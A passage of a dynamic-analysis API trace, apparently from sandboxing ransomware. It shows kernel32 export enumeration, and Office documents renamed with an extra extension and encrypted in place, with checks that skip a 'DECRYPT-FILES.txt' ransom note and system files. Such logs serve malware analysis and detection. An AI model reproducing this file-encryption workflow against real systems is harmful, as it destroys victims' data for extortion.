lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.028] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.028] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.028] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.028] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.028] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.028] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.028] lstrlenA (lpString="DELETEATOM") returned 10 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.028] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.028] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.028] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.028] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.028] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.028] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.029] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.029] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.029] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.029] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.029] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.029] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.029] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.029] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.029] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.029] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.029] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.029] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.029] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.029] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.029] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.029] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.029] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.029] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.029] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.029] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.030] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.030] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.030] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.030] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.030] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.030] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.030] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.030] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.030] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.030] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.030] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.030] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.030] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.030] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.030] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.030] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.030] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.031] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\S46h3QD3.ppt") returned 70 [0084.031] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\S46h3QD3.ppt.mu9pP") returned 76 [0084.031] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\S46h3QD3.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\s46h3qd3.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\S46h3QD3.ppt.mu9pP" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\s46h3qd3.ppt.mu9pp"), dwFlags=0x0) returned 1 [0084.031] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.031] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.032] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.032] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3488000, ftCreationTime.dwHighDateTime=0x1d4cec1, ftLastAccessTime.dwLowDateTime=0xa25a36d0, ftLastAccessTime.dwHighDateTime=0x1d4c56f, ftLastWriteTime.dwLowDateTime=0xa25a36d0, ftLastWriteTime.dwHighDateTime=0x1d4c56f, nFileSizeHigh=0x0, nFileSizeLow=0xf9bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="TfbGpUNnTUe.docx", cAlternateFileName="TFBGPU~1.DOC")) returned 1 [0084.032] lstrcmpiW (lpString1="TfbGpUNnTUe.docx", lpString2="DECRYPT-FILES.txt") returned 1 [0084.032] lstrcmpiW (lpString1="TfbGpUNnTUe.docx", lpString2="autorun.inf") returned 1 [0084.032] lstrcmpiW (lpString1="TfbGpUNnTUe.docx", lpString2="boot.ini") returned 1 [0084.032] lstrcmpiW (lpString1="TfbGpUNnTUe.docx", lpString2="desktop.ini") returned 1 [0084.032] lstrcmpiW (lpString1="TfbGpUNnTUe.docx", lpString2="ntuser.dat") returned 1 [0084.032] lstrcmpiW (lpString1="TfbGpUNnTUe.docx", lpString2="iconcache.db") returned 1 [0084.032] lstrcmpiW (lpString1="TfbGpUNnTUe.docx", lpString2="bootsect.bak") returned 1 [0084.032] lstrcmpiW (lpString1="TfbGpUNnTUe.docx", lpString2="ntuser.dat.log") returned 1 [0084.032] lstrcmpiW (lpString1="TfbGpUNnTUe.docx", lpString2="thumbs.db") returned -1 [0084.032] lstrcmpiW (lpString1="TfbGpUNnTUe.docx", lpString2="Bootfont.bin") returned 1 [0084.032] lstrlenW (lpString="TfbGpUNnTUe.docx") returned 16 [0084.032] lstrcmpiW (lpString1="docx", lpString2="lnk") returned -1 [0084.032] lstrcmpiW (lpString1="docx", lpString2="exe") returned -1 [0084.032] lstrcmpiW (lpString1="docx", lpString2="sys") returned -1 [0084.032] lstrcmpiW (lpString1="docx", lpString2="dll") returned 1 [0084.032] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0084.032] lstrlenW (lpString="TfbGpUNnTUe.docx") returned 16 [0084.032] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0084.032] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="TfbGpUNnTUe.docx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\TfbGpUNnTUe.docx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\TfbGpUNnTUe.docx" [0084.032] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.033] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\TfbGpUNnTUe.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\tfbgpunntue.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0084.033] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=63931) returned 1 [0084.033] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0084.033] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.033] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.033] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.033] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.034] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0084.034] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.035] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.035] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.036] CloseHandle (hObject=0x42c) returned 1 [0084.036] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.036] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0084.037] CloseHandle (hObject=0x0) returned 0 [0084.037] CloseHandle (hObject=0x428) returned 1 [0084.037] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.037] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.037] GetTickCount () returned 0x114d79a [0084.037] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.038] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.038] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.038] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.038] lstrlenA (lpString="kernel32.dll") returned 12 [0084.038] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.038] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.038] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.038] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.038] lstrlenA (lpString="ADDATOMA") returned 8 [0084.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.039] lstrlenA (lpString="ADDATOMW") returned 8 [0084.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.039] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.039] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.039] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.039] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.039] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.039] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.039] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.039] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.039] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.039] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.039] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.039] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.039] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.039] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.039] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.039] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.039] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.039] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.040] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.040] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.040] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.040] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.040] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.040] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.040] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.040] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.040] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.040] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.040] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.040] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.040] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.040] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.040] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.040] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: 